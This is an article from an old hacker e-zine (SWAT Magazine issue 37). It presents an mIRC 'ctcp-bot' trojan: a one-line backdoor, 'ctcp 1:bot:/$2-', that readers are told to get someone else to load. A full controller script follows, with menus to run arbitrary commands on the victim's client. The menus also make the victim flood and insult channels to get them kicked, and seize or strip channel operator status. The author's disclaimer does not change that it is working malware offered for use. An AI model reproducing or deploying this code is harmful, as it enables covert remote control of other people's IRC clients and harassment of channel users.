   _________  SWAT MAGAZINE ISSUE THIRTY SEVEN JANUARY   __________
  /         \___________________________________________/          \
/                   ctcp-bot (control script)                       \
/                             by Abus                                \
-----------------------------------------------------------------------

This is a mirc control script that uses the ctcp (Client-To-Client-Protocol)
This is Normally used for things like ping and version all it dose is well i
am better showing you.
ctcp 1:hello:/msg $nick Hello to you too
^
| Now of you use the command /ctcp nick hello you will get a msg saying
"hello to you" the ctcp command used for this script is
ctcp 1:bot:/$2-
^
| In this script in we use the $2- this means what ever you put after the
/ctcp nick bot will be put in the command line so you can operate this
script form the command line the scriptblow is just some popus to save time
typing in all them commands.
I hope you like it.

---------------------------------------now to the good stuff-------------

To put the ctcp-bot in to mirc just.
1 Put the line "ctcp 1:bot:/$2-" in to a script without the "
2 Get someone to laod the script on mirc
3 That is all

To upload the Control script just
1 copy the text blow in to notepab
2 Save it as bot.mrc in your mirc dir
3 Type "/load -rs bot.mrc" without the "
4 That is all

Mirc trojan By Abus

abus_@hotmail.com

Disclaimer
This progam was not made to do harm but more as a ctcp bot
abus accepts no responsibility for misuse of the ctcp bot
that crime falls on the head of the person using the script
Be warned

ctcp bot ver 0.2

-----------------------------ctcp bot ver 0.2---------------------------
on *:LOAD:{
  /echo -a This is The Control script for 4ctcp-bot 0.2 BY 11<>ABUS<>
  /echo -a Disclaimer
  /echo -a This program was not made to do harm but more as a ctcp bot
  /echo -a abus accepts no responsibility for misuse of the ctcp bot
  /echo -a that crime falls on the head of the person using the script
  /echo -a Be warned

}
  menu nicklist {
  Torjan control (ctcp bot)
  .Ctcp Test:/ctcp $$1 bot notice $me is +
  .Chan controls
  ..Op me:/ctcp $$1 bot mode $chan +o $me
  ..Deop me:/ctcp $$1 bot mode $chan -o $me
  ..Op user:/ctcp $$1 bot mode $chan +o $$?="User Name:"
  ..Deop user:/ctcp $$1 bot mode $chan -o $$?="User Name:"
  .-
  .Exit Mirc:/ctcp $$1 bot exit
  .Enter Command:/ctcp $$1 bot $$?="enter command without /:"
  .Msg Chan user:/ctcp $$1 bot msg $$?="Enter chan or nick:" $$?="Enter
msg:"
  .Take over {
    /ctcp $$1 bot mode $chan +o $me
    /ctcp $$1 bot mode $chan -o $$1
  }
  .Get user kicked {
    /ctcp $$1 bot msg $chan hey i hate you all you are all Dick Heads
    /ctcp $$1 bot msg $chan flood
    /ctcp $$1 bot msg $chan flood
    /ctcp $$1 bot msg $chan flood
    /ctcp $$1 bot msg $chan flood
}
.Deop 2-10 users
  ..Deop-2:/ctcp $$1 bot mode $chan -oo $$?="User Name1:" $$?="User Name2:"
  ..Deop-3:/ctcp $$1 bot mode $chan -ooo $$?="User Name1:" $$?="User Name2:"
  $$?="User Name3:"
  ..Deop-4:/ctcp $$1 bot mode $chan -oooo $$?="User Name1:" $$?="User
Name2:" $$?="User Name3:" $$?="User Name4:"
  ..Deop-5:/ctcp $$1 bot mode $chan -ooooo $$?="User Name1:" $$?="User
Name2:" $$?="User Name3:" $$?="User Name4:" $$?="User Name5:"
  ..Deop-6:/ctcp $$1 bot mode $chan -oooooo $$?="User Name1:" $$?="User
Name2:" $$?="User Name3:" $$?="User Name4:" $$?="User Name5:" $$?="User
Name6:"
  ..Deop-7:/ctcp $$1 bot mode $chan -ooooooo $$?="User Name1:" $$?="User
Name2:" $$?="User Name3:" $$?="User Name4:" $$?="User Name5:" $$?="User
Name6:" $$?="User Name7:"
  ..Deop-8:/ctcp $$1 bot mode $chan -oooooooo $$?="User Name1:" $$?="User
Name2:" $$?="User Name3:" $$?="User Name4:" $$?="User Name5:" $$?="User
Name6:" $$?="User Name7:" $$?="User Name8:"
  ..Deop-9:/ctcp $$1 bot mode $chan -ooooooooo $$?="User Name1:" $$?="User
Name2:" $$?="User Name3:" $$?="User Name4:" $$?="User Name5:" $$?="User
Name6:" $$?="User Name7:" $$?="User Name8:" $$?="User Name9:"
  ..Deop-10:/ctcp $$1 bot mode $chan -oooooooooo $$?="User Name1:" $$?="User
Name2:" $$?="User Name3:" $$?="User Name4:" $$?="User Name5:" $$?="User
Name6:" $$?="User Name7:" $$?="User Name8:" $$?="User Name9:" $$?="User
Name10:"
.Op 2-10 users
  ..Op-2:/ctcp $$1 bot mode $chan +oo $$?="User Name1:" $$?="User Name2:"
  ..Op-3:/ctcp $$1 bot mode $chan +ooo $$?="User Name1:" $$?="User Name2:"
$$?="User Name3:"
  ..Op-4:/ctcp $$1 bot mode $chan +oooo $$?="User Name1:" $$?="User Name2:"
$$?="User Name3:" $$?="User Name4:"
  ..Op-5:/ctcp $$1 bot mode $chan +ooooo $$?="User Name1:" $$?="User Name2:"
$$?="User Name3:" $$?="User Name4:" $$?="User Name5:"
  ..Op-6:/ctcp $$1 bot mode $chan +oooooo $$?="User Name1:" $$?="User
Name2:" $$?="User Name3:" $$?="User Name4:" $$?="User Name5:" $$?="User
Name6:"
  ..Op-7:/ctcp $$1 bot mode $chan +ooooooo $$?="User Name1:" $$?="User
Name2:" $$?="User Name3:" $$?="User Name4:" $$?="User Name5:" $$?="User
Name6:" $$?="User Name7:"
  ..Op-8:/ctcp $$1 bot mode $chan +oooooooo $$?="User Name1:" $$?="User
Name2:" $$?="User Name3:" $$?="User Name4:" $$?="User Name5:" $$?="User
Name6:" $$?="User Name7:" $$?="User Name8:"
  ..Op-9:/ctcp $$1 bot mode $chan +ooooooooo $$?="User Name1:" $$?="User
Name2:" $$?="User Name3:" $$?="User Name4:" $$?="User Name5:" $$?="User
Name6:" $$?="User Name7:" $$?="User Name8:" $$?="User Name9:"
  ..Op-10:/ctcp $$1 bot mode $chan +oooooooooo $$?="User Name1:" $$?="User
Name2:" $$?="User Name3:" $$?="User Name4:" $$?="User Name5:" $$?="User
Name6:" $$?="User Name7:" $$?="User Name8:" $$?="User Name9:" $$?="User
Name10:"
}
}
-------------------------------------------------ctcp bot ver
0.2--------------------------------

